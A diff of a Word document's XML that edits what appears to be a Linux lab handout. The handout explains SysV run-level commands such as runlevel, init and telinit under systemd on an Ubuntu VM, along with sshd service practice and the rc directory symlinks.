+        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to show the current </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>runlevel</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for the GUI level.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to change </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>telinit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is supported in systemd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (note: it works in VMware Player 16.1.2 with Ubuntu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>20.04 but</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> locks up in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VMware Player 15.1 and Ubuntu 18.04</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  The command to change to the Ubuntu console </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> would be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(emergency)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (console only).  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">udo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> would take you back to the GUI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or the old run level 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  Your VM will </w:t>
+      </w:r>
+      <w:r>
+        <w:t>drop</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> into a terminal-only mode.  What you will see is terminal with no GUI, like the sysadmins had in days of old.  Notice that there is no scroll bar, so something that goes off the top of the screen is gone forever.  There is no mouse</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pointer for cutting and pasting</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  Omg, how did they manage?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA9A80" wp14:editId="498E14FC">
+            <wp:extent cx="4747565" cy="1357317"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -575,7 +1556,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5330637" cy="1956817"/>
+                      <a:ext cx="4789643" cy="1369347"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -587,260 +1568,40 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>You will see later that the output is the same as what you get with the systemd commands.  The SysV commands have been intercepted and passed to systemd.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Practice using the SysV </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> command </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>service ssh status</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>to check that the previous command worked as you think it should.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">When you are done, make sure the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> service is stopped.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If you run </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ls /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>or</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ls /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>*</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -d </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">to see just directories that start with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>directories</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that provide SysV compatibility.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>The standard run level that</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> provides GUI support</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is 5,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> so let’s look at </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>rc5.d</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ls -l /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/rc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>.d</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cntl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-alt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655C60ED" wp14:editId="69A7EC1F">
-            <wp:extent cx="4742597" cy="724653"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-            <wp:docPr id="6" name="Picture 6"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9CCE06" wp14:editId="6052A0C8">
+            <wp:extent cx="4849978" cy="822838"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -848,7 +1609,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -860,7 +1621,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4844396" cy="740208"/>
+                      <a:ext cx="4978676" cy="844673"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -872,149 +1633,45 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The symbolic links</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/rc</w:t>
-      </w:r>
-      <w:r>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.d point to files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Log in and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">use sudo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
         <w:t>init</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> and /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>directory</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, you will see it contains a shell script.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> point to.  It uses </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get back to the desktop.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E03D7A6" wp14:editId="47832150">
-            <wp:extent cx="4261110" cy="2348837"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="5" name="Picture 5"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FF839" wp14:editId="645F8F20">
+            <wp:extent cx="4879238" cy="2018420"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="7" name="Picture 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1034,699 +1691,6 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4290149" cy="2364844"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> directory, since </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.  There is a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
